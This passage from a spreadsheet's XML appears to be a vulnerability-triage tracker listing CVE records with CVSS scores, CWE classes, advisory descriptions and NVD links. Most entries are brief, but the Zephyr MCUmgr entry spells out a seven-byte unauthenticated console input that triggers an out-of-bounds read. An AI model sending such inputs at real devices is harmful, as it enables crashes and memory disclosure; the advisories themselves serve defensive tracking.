with an hours-long cacheLife. Repeated unauthenticated invocation of revalidateProducts keeps that cache permanently cold, forcing every visitor's request to read the full product catalog from Postgres instead of serving from cache, degrading storefront availability at near-zero attacker cost.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91154</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102247</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in FastAdmin 1.6.1.20250430/1.6.5.20260602. This affects an unknown function of the file application/database.php of the component Database Management. The manipulation results in execution with unnecessary privileges. The attack may be launched remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102247</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18747</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-191</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>The MCUmgr SMP-over-console transport decodes a base64 frame, reads a 16-bit packet length from it, verifies a CRC and then unconditionally strips the trailing CRC with rx_ctxt-&gt;nb-&gt;len -= 2U; in mcumgr_serial_process_frag() (subsys/mgmt/mcumgr/transport/src/serial_util.c). mcumgr_serial_extract_len() accepted any declared length, including 0 and 1, and a packet declaring length 0 passes the checksum test for free because crc16_itu_t() over zero bytes returns the zero seed. Since net_buf::len is a uint16_t, the subtraction underflows and the buffer is handed to SMP claiming roughly 65 KB of payload while its data area is only CONFIG_MCUMGR_TRANSPORT_NETBUF_SIZE bytes (default 384).
The trigger is a single unauthenticated 7-byte line on the management console — the 0x06 0x09 packet marker followed by the base64 group AAA= and a newline — delivered to any transport built on this helper: CONFIG_MCUMGR_TRANSPORT_UART (smp_uart.c) or CONFIG_MCUMGR_TRANSPORT_SHELL (smp_shell.c), both of which select MCUMGR_TRANSPORT_SERIAL_HAS_SMP_OVER_CONSOLE. No prior session state, fragmentation or credentials are required to trigger the underflow, and the malformed frame is mishandled before any command handler or command-level access control runs. The attacker only needs write access to that console, which on many boards is a USB CDC-ACM port rather than a bare UART header.
With the inflated length, smp_process_request_packet() in subsys/mgmt/mcumgr/smp/src/smp.c loses its bound: cbor_nb_reader_init() gives the CBOR decoder a ~65 KB window into a 384-byte buffer, and each request header's nh_len is checked only against the inflated length. On its own the 7-byte frame re-parses whatever stale bytes the reused pool buffer still holds, typically a replay of the previously received request followed by a parse error, without leaving the buffer. Because the transport is unauthenticated, though, the attacker also controls the frames sent before the trigger, and can stage buffer contents so that a request succeeds with an nh_len larger than the buffer; net_buf_pull(), guarded only by __ASSERT_NO_MSG, then moves the parse cursor out of bounds and the loop reads further headers and CBOR from adjacent memory. The consequence is an out-of-bounds read that can fault the MCUmgr thread (denial of service); memory disclosure is also possible, since the default-enabled os echo handler (CONFIG_MCUMGR_GRP_OS_ECHO) decodes its string inside that window and copies it into its response. There is no integrity gain beyond what the unauthenticated transport already permits.
The fix rejects any declared packet length of two bytes or fewer in mcumgr_serial_extract_len(), so the CRC-strip subtraction can no longer underflow. The identical pattern remains in the test-only loopback transport subsys/mgmt/mcumgr/transport/src/smp_dummy.c (CONFIG_MCUMGR_TRANSPORT_DUMMY), which has no external input path and therefore carries no practical exposure.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18747</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80359</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-1191</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>Dell Boot Optimized Server Storage (BOSS), versions prior to 2.2.13.2038, contains an On-Chip Debug and Test Interface With Improper Access Control vulnerability in the SMCU on 17G BOSS-N1 controllers. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80359</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93000</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>The SPS-Suite WordPress plugin through 1.4.0 does not sanitise the search query before using it in a SQL query when its static-page search feature is enabled, allowing unauthenticated attackers to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93000</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58386</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>ZoneMinder versions 1.37.0 before 1.38.0 contain a path traversal vulnerability in the files view that allows authenticated users to read arbitrary files. The path parameter is not properly validated before being passed to output_file, enabling attackers with Events view permission to access sensitive files like configuration files containing database credentials.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58386</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101040</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-404</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Ricoh SP 330DN, SP 221, SP C252SF and Aficio SP 3500SF up to 20260813. This affects an unknown part of the component HTTP Multipart Form-Data Parser. Performing a manipulation results in denial of service. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101040</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101277</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Trusted Domain Project OpenDKIM up to 2.11.0. The impacted element is the function dkim_process_set of the file dkim.c of the component Tag Tokenizer. Performing a manipulation results in use of less trusted source. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101277</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101279</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-190</t>
        </is>
      </c>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Trusted Domain Project OpenDMARC up to 1.4.2. This impacts an unknown function of the file libopendmarc/opendmarc_policy.c of the component DMARC Parser. The manipulation of the argument pct leads to integer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101279</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101914</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr">
        <is>
          <t>npm, grpc</t>
        </is>
      </c>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr">
        <is>
          <t>npm:@grpc/grpc-js-xds</t>
        </is>
      </c>
      <c r="M162" s="5" t="inlineStr">
        <is>
          <t>1.13.1, 1.14.1</t>
        </is>
      </c>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-187, CWE-863</t>
        </is>
      </c>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>@grpc/grpc-js implements the core functionality of gRPC purely in JavaScript, without a C++ addon. Prior to 1.13.1 and 1.14.1, the exact path (method name) matcher used by RBAC performs a prefix comparison instead of an equality comparison when case-insensitive matching is enabled. If one service method name prefixes another and the methods have different access rules, a request for the longer method can match the shorter method's rule and cause incorrect authorization. This issue is fixed in versions 1.13.1 and 1.14.1.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101914</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102275</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-348</t>
        </is>
      </c>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.1.0 until 2.15.0, PyJWT OKPAlgorithm.from_jwk in  jwt/algorithms.py is affected because private-JWK import path does not compare the public key derived from d with x. This occurs when an OKP private JWK supplies non-corresponding x and d components. As a result, identity derived from x can differ from operations performed with d. Consequently, if an integration also accepts private key parameters from a proof header without rejecting them, an attacker may use a stolen sender-constrained token without the legitimate private key. This issue is fixed in version 2.15.0.</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102275</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102296</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>ZoneMinder before 1.38.4 contains static buffer overflow vulnerabilities in RemoteCameraHttp::GetResponse() that allow malicious HTTP cameras or intercepting attackers to overflow fixed-size buffers by sending oversized response headers. Attackers can send crafted HTTP responses with oversized status messages, Connection headers, Content-Type values, or multipart boundaries to corrupt parser state and crash the capture process or corrupt memory.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102296</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102365</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 fails to enforce authorization checks on GET endpoints in UserAddrController that retrieve customer address data. Authenticated attackers can call /user/addr/page and /user/addr/info endpoints to harvest all customer addresses including names, phone numbers, and postal information.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102365</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102373</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>GestSup versions before 3.2.62 fail to validate ticket ownership when loading comments via the threadedit parameter in thread.php. Authenticated attackers can enumerate sequential comment IDs to read private comments from other users' tickets without proper authorization checks.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102373</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18417</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>The native BSD-socket layer recorded a pending asynchronous socket error by type-punning it into struct net_context's void user_data field (ctx-&gt;user_data = INT_TO_POINTER(-status) in zsock_accepted_cb(), zsock_received_cb(), zsock_connected_cb() and zsock_close_ctx() in subsys/net/lib/sockets/sockets_inet.c), reading it back with POINTER_TO_INT(). That same field is owned by the network stack for listening TCP contexts: net_tcp_accept() stores the parent context pointer there and the TCP core passes it back to the registered accept callback. A failed accept therefore left a small integer (an errno value) where the stack expected a struct net_context .
When the network interface carrying a listening TCP socket goes down, close_tcp_conn() in subsys/net/ip/tcp.c invokes the accept callback with -ENETDOWN and the context's user_data. In v4.3.0 the callback was not disarmed afterwards, so a second interface-down event forwarded the previously stored errno to zsock_accepted_cb(), which dereferenced it as the parent context and performed several stores through it (sock_set_error()'s read-modify-write of socket_data, k_fifo_cancel_wait(&amp;parent-&gt;recv_q)) — the crash described in the fix's commit message. v4.3.1 and v4.4.x carry a later change clearing conn-&gt;accept_cb after the error callback (269cb8823d3 on the v4.3 branch, 913fae5169425550f2364655298fceb79b320066 on main), which closes that repeat path; on those releases the poisoned cookie remains reachable only by a narrower race, a handshake completing alongside the interface-down still passing the stale cookie to k_fifo_put(&amp;parent-&gt;accept_q, ...), and by getsockopt(SO_ERROR), which reads the field back unconditionally.
